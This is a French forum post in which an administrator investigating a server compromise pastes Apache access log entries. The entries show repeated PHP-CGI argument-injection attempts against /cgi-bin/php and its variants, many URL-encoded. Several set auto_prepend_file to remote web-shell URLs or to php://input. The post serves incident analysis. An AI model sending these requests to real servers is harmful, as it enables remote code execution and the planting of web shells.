[quote]/etc/cron.hourly[/quote] est vide
syam d’après mes recherches la faille était dans cgi-bincgi-bin
extrait des fichier log
apache/access.log
81.2.197.141 - - [18/Nov/2013:14:39:17 +0300] “POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1” 200 301 “-” "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
2.100.158.26 - - [18/Nov/2013:15:55:07 +0300] “9\xd2\t\x91\xfb\xa4\t\x05\xf3N*\xeeVs\xbc)\xa5(\x89lRgp\xa3\x0e” 400 506 “-” "-"
5.15.26.215 - - [18/Nov/2013:19:43:57 +0300] “m\b\x9aP\xd9\x16\xb8n\xe5%{\xd50\xf4\x1e\x94/2\xf8\x8e\xe8\xfdI\xad\xb6\x89L\xcd\x93\x94\xbe5n\x03\xe9K” 200 1397 “-” "-"
94.102.63.245 - - [19/Nov/2013:00:46:58 +0300] “GET /cgi-bin/php HTTP/1.0” 500 829 “-” “-”
82.221.102.181 - - [21/Nov/2013:17:33:35 +0300] "GET /cgi-bin/php?-d+safe_mode%3Doff±dsuhosin.simulation%3Don±ddisable_functions%3D%22±dopen_basedir%3Dnone±d+cgi.force_redirect%3D0±dcgi.redirect_status_env%3D0±dallow_url_include%3Don±dauto_prepend_file%3Dhttp://files.xakep.biz/shells/PHP/wso.txt HTTP/1.1 " 500 229 “-” "curl/7.32.0"
82.221.102.181 - - [21/Nov/2013:17:34:46 +0300] "GET /cgi-bin/php?-d+safe_mode%3Doff±dsuhosin.simulation%3Don±ddisable_functions%3D%22±dopen_basedir%3Dnone±d+cgi.force_redirect%3D0±dcgi.redirect_status_env%3D0±dallow_url_include%3Don±dauto_prepend_file%3Dhttp://files.xakep.biz/shells/PHP/wso.txt HTTP/1.1 " 500 229 “-” "curl/7.32.0"
82.221.102.181 - - [21/Nov/2013:17:39:01 +0300] "GET /cgi-bin/php?-d+safe_mode%3Doff±dsuhosin.simulation%3Don±ddisable_functions%3D%22±dopen_basedir%3Dnone±d+cgi.force_redirect%3D0±dcgi.redirect_status_env%3D0±dallow_url_include%3Don±dauto_prepend_file%3Dhttp://files.xakep.biz/shells/PHP/wso.txt HTTP/1.1 " 200 10338 “-” "curl/7.32.0"
82.221.102.181 - - [21/Nov/2013:17:41:22 +0300] "GET /cgi-bin/php?-d+safe_mode%3Doff±dsuhosin.simulation%3Don±ddisable_functions%3D%22%22±dopen_basedir%3Dnone±d+cgi.force_redirect%3D0±dcgi.redirect_status_env%3D0±dallow_url_include%3Don±dauto_prepend_file%3Dhttp://files.xakep.biz/shells/PHP/wso.txt HTTP/1.1 " 500 229 “-” "curl/7.32.0"
82.221.102.181 - - [21/Nov/2013:17:46:00 +0300] “GET /cgi-bin/php?-d+safe_mode%3Doff±dsuhosin.simulation%3Don±ddisable_functions%3D%22%22±dopen_basedir%3Dnone±d+cgi.force_redirect%3D0±dcgi.redirect_status_env%3D0±dallow_url_include%3Don±dauto_prepend_file%3Dhttp://files.xakep.biz/shells/PHP/wso.txt HTTP/1.0” 500 229 “-” "-"
82.221.102.181 - - [21/Nov/2013:17:47:48 +0300] “GET /cgi-bin/php?-d+safe_mode%3Doff±dsuhosin.simulation%3Don±ddisable_functions%3D%22%22±dopen_basedir%3Dnone±d+cgi.force_redirect%3D0±dcgi.redirect_status_env%3D0±dallow_url_include%3Don±dauto_prepend_file%3Dhttp://files.xakep.biz/shells/PHP/wso.txt HTTP/1.0” 500 229 “-” "-"
82.221.102.181 - - [21/Nov/2013:17:48:49 +0300] “GET /cgi-bin/php?-d+safe_mode%3Doff±dsuhosin.simulation%3Don±ddisable_functions%3D%22%22±dopen_basedir%3Dnone±d+cgi.force_redirect%3D0±dcgi.redirect_status_env%3D0±dallow_url_include%3Don±dauto_prepend_file%3Dhttp://files.xakep.biz/shells/PHP/wso.txt HTTP/1.0” 500 229 “-” "-"
82.221.102.181 - - [21/Nov/2013:18:31:31 +0300] “GET /cgi-bin/php?-d+safe_mode%3Doff±dsuhosin.simulation%3Don±ddisable_functions%3D%22%22±dopen_basedir%3Dnone±d+cgi.force_redirect%3D0±dcgi.redirect_status_env%3D0±dallow_url_include%3Don±dauto_prepend_file%3Dhttp://files.xakep.biz/shells/PHP/wso.txt HTTP/1.1” 200 10341 “-” "curl/7.32.0"
94.102.56.237 - - [22/Nov/2013:00:15:52 +0300] “GET /cgi-php HTTP/1.0” 404 483 “-” "-"
94.102.56.237 - - [22/Nov/2013:00:48:51 +0300] “GET /cgi-php5 HTTP/1.0” 404 484 “-” "-"
50.116.50.35 - - [22/Nov/2013:00:44:26 +0300] “POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1” 504 508 “-” "-"
94.102.56.237 - - [22/Nov/2013:01:22:08 +0300] “GET /cgi-php4 HTTP/1.0” 404 484 “-” "-"
80.28.121.52 - - [22/Nov/2013:02:19:20 +0300] “HEAD / HTTP/1.0” 200 386 “-” "-"
80.28.121.52 - - [22/Nov/2013:02:19:20 +0300] “POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1” 500 833 “-” “Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25”
80.28.121.52 - - [22/Nov/2013:02:21:13 +0300] “POST /cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1” 500 833 “-” "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
80.28.121.52 - - [22/Nov/2013:02:21:17 +0300] “POST /cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1” 404 495 “-” "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
80.28.121.52 - - [22/Nov/2013:02:21:18 +0300] “POST /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1” 404 495 “-” "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
80.28.121.52 - - [22/Nov/2013:02:21:19 +0300] “POST /cgi-bin/php4?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1” 404 492 “-” "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
189.36.12.66 - - [22/Nov/2013:03:30:47 +0300] “GET /manager/html HTTP/1.1” 404 504 “-” "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"
94.102.56.237 - - [22/Nov/2013:04:31:57 +0300] “GET /cgi-bin/php HTTP/1.0” 500 829 “-” "-"
94.102.56.237 - - [22/Nov/2013:05:05:03 +0300] “GET /cgi-bin/php5 HTTP/1.0” 500 829 “-” "-"
94.102.56.237 - - [22/Nov/2013:05:38:07 +0300] “GET /cgi-bin/php4 HTTP/1.0” 404 488 “-” "-"
1.234.31.127 - - [22/Nov/2013:06:40:17 +0300] “HEAD / HTTP/1.0” 200 386 “-” "-"
1.234.31.127 - - [22/Nov/2013:06:40:18 +0300] “POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1” 504 538 “-” "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
1.234.31.127 - - [22/Nov/2013:06:50:22 +0300] “POST /cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1” 504 538 “-” “Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25”
94.102.56.237 - - [22/Nov/2013:12:45:24 +0300] “GET /cgi-bin/php?-d+allow_url_include%3Don±d+safe_mode%3Doff±d+suhosin1.448420E-316simulation%3Don±d+disable_functions%3D±d+open_basedir%3Dnone±d+auto_prepend_file%3Dhttp0X0.07FFFEF42B6AP-10220.0000000.000000192.151.144.2340.000000lurk.txt±d+cgi1.020451E-314force_redirect%3D0±d+cgi1.396073E-316redirect_status_env%3D0±n HTTP/1.0” 500 829 “-” "-"
94.102.56.237 - - [22/Nov/2013:12:47:56 +0300] “GET /cgi-bin/php?-d+allow_url_include%3Don±d+safe_mode%3Doff±d+suhosin2.260321E-316simulation%3Don±d+disable_functions%3D±d+open_basedir%3Dnone±d+auto_prepend_file%3Dhttp0X0.07FFF142588DP-10220.0000000.000000192.151.144.2340.000000lurk.txt±d+cgi1.020451E-314force_redirect%3D0±d+cgi2.239255E-316redirect_status_env%3D0±n HTTP/1.0\r\n\r\n” 500 829 “-” "-"
210.245.23.136 - - [22/Nov/2013:16:12:19 +0300] “HEAD / HTTP/1.0” 200 386 “-” "-"
210.245.23.136 - - [22/Nov/2013:16:12:20 +0300] “POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1” 500 833 “-” "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
210.245.23.136 - - [22/Nov/2013:16:16:59 +0300] “POST /cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1” 504 538 “-” “Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25”
210.245.23.136 - - [22/Nov/2013:16:27:07 +0300] “POST /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1” 404 495 “-” "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
210.245.23.136 - - [22/Nov/2013:16:27:09 +0300] “POST /cgi-bin/php4?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1” 404 492 “-” "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
94.102.56.237 - - [22/Nov/2013:17:47:29 +0300] “GET /cgi-bin/php HTTP/1.0” 500 829 “-” "-"
80.82.78.9 - - [22/Nov/2013:17:57:23 +0300] “POST //%63%67%69%2d%62%69%6e/%70%68%70?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%6e HTTP/1.1” 200 325 “-” "-"
219.136.138.69 - - [22/Nov/2013:18:33:38 +0300] “\x81\xc1\x90J\xa9A\x96\xf5\xf0\x1f&\xca<\xb0_\xf1\x0f\x03\x9fJ\x93\xa8\xd7\x1f\xcb\xe7L\xdcM\xbe\xb8\xaa\xa4r\x83\xf1*\xf0=\xf5\x8b\x8f\xe3\xa6yY\xbd\x03\x94\xc5\xba&-\xf7” 200 1397 “-” "-"
80.82.78.9 - - [22/Nov/2013:18:52:30 +0300] “POST //%63%67%69%2d%62%69%6e/%70%68%70?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%6e HTTP/1.1” 200 3784 “-” "-"
94.102.56.237 - - [22/Nov/2013:18:54:21 +0300] “GET /cgi-bin/php?-d+allow_url_include%3Don±d+safe_mode%3Doff±d+suhosin%2Esimulation%3Don±d+disable_functions%3D”“±d+open_basedir%3Dnone±d+auto_prepend_file%3Dhttp%3A%2F%2F192.151.144.234%2Flurk.txt±d+cgi%2Eforce_redirect%3D0±d+cgi%2Eredirect_status_env%3D0±n HTTP/1.0” 200 336 “-” "-"
80.82.78.9 - - [22/Nov/2013:19:05:32 +0300] “POST //%63%67%69%2d%62%69%6e/%70%68%70?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%6e HTTP/1.1” 200 1200 “-” "-"
94.102.56.237 - - [22/Nov/2013:19:12:51 +0300] “GET / HTTP/1.0” 200 1805 “-” "-"
94.102.56.237 - - [22/Nov/2013:19:35:42 +0300] “GET /cgi-bin/php?-d+allow_url_include%3Don±d+safe_mode%3Doff±d+suhosin%2Esimulation%3Don±d+disable_functions%3D”“±d+open_basedir%3Dnone±d+auto_prepend_file%3Dhttp%3A%2F%2F192.151.144.234%2Flurk.txt±d+cgi%2Eforce_redirect%3D0±d+cgi%2Eredirect_status_env%3D0±n HTTP/1.0” 200 336 “-” "-"
94.102.56.237 - - [22/Nov/2013:19:37:42 +0300] “GET /cgi-bin/php?-d+allow_url_include%3Don±d+safe_mode%3Doff±d+suhosin%2Esimulation%3Don±d+disable_functions%3D”“±d+open_basedir%3Dnone±d+auto_prepend_file%3Dhttp%3A%2F%2F192.151.144.234%2Flurk.txt±d+cgi%2Eforce_redirect%3D0±d+cgi%2Eredirect_status_env%3D0±n HTTP/1.0” 200 336 “-” "-"
94.102.56.237 - - [22/Nov/2013:19:39:01 +0300] “GET /cgi-bin/php?-d+allow_url_include%3Don±d+safe_mode%3Doff±d+suhosin%2Esimulation%3Don±d+disable_functions%3D”“±d+open_basedir%3Dnone±d+auto_prepend_file%3Dhttp%3A%2F%2F192.151.144.234%2Flurk.txt±d+cgi%2Eforce_redirect%3D0±d+cgi%2Eredirect_status_env%3D0±n HTTP/1.0” 200 336 “-” "-"
94.102.56.237 - - [22/Nov/2013:19:40:50 +0300] “GET /cgi-bin/php?-d+allow_url_include%3Don±d+safe_mode%3Doff±d+suhosin%2Esimulation%3Don±d+disable_functions%3D”“±d+open_basedir%3Dnone±d+auto_prepend_file%3Dhttp%3A%2F%2F192.151.144.234%2Flurk.txt±d+cgi%2Eforce_redirect%3D0±d+cgi%2Eredirect_status_env%3D0±n HTTP/1.0” 200 336 “-” "-"
94.102.56.237 - - [22/Nov/2013:19:42:06 +0300] “GET /cgi-bin/php?-d+allow_url_include%3Don±d+safe_mode%3Doff±d+suhosin%2Esimulation%3Don±d+disable_functions%3D”“±d+open_basedir%3Dnone±d+auto_prepend_file%3Dhttp%3A%2F%2F192.151.144.234%2Flurk.txt±d+cgi%2Eforce_redirect%3D0±d+cgi%2Eredirect_status_env%3D0±n HTTP/1.0” 200 315 “-” "-"
94.102.56.237 - - [22/Nov/2013:19:43:25 +0300] “GET /cgi-bin/php?-d+allow_url_include%3Don±d+safe_mode%3Doff±d+suhosin%2Esimulation%3Don±d+disable_functions%3D”“±d+open_basedir%3Dnone±d+auto_prepend_file%3Dhttp%3A%2F%2F192.151.144.234%2Flurk.txt±d+cgi%2Eforce_redirect%3D0±d+cgi%2Eredirect_status_env%3D0±n HTTP/1.0” 200 315 “-” "-"
94.102.56.237 - - [22/Nov/2013:23:00:36 +0300] “GET /cgi-bin/php?-d+allow_url_include%3Don±d+safe_mode%3Doff±d+suhosin%2Esimulation%3Don±d+disable_functions%3D”“±d+open_basedir%3Dnone±d+auto_prepend_file%3Dhttp%3A%2F%2F192.151.144.234%2Flurk.txt±d+cgi%2Eforce_redirect%3D0±d+cgi%2Eredirect_status_env%3D0±n HTTP/1.0” 200 315 “-” "-"
